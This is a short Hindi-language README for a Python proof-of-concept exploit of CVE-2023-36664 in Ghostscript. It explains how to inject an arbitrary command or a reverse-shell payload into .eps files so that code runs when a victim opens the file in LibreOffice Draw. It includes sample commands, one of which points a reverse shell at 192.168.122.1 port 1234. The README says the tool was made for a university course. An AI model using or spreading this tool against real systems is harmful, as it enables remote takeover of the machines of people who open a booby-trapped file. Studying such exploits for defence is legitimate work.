
CVE-2023-36664 Ghostscript RCE के लिए Python PoC। LibreOffice Draw के माध्यम से कोड निष्पादन को ट्रिगर करने के लिए .eps फ़ाइलों में पेलोड या रिवर्स शेल इंजेक्ट करता है।
CVE-2023-36664 के लिए अवधारणा का प्रमाण।
एक .eps फ़ाइल में पेलोड सम्मिलित करने के लिए :
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox
एक .eps फ़ाइल में रिवर्स शेल पेलोड सम्मिलित करने के लिए :
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
इंजेक्ट की गई फ़ाइल को Libreoffice Draw में खोलने पर पेलोड ट्रिगर होना चाहिए।
यह अवधारणा का प्रमाण विश्वविद्यालय में एक विशिष्ट पाठ्यक्रम के लिए विकसित किया गया था। इसे यहां केवल शैक्षणिक उपयोग के लिए प्रकाशित किया गया है।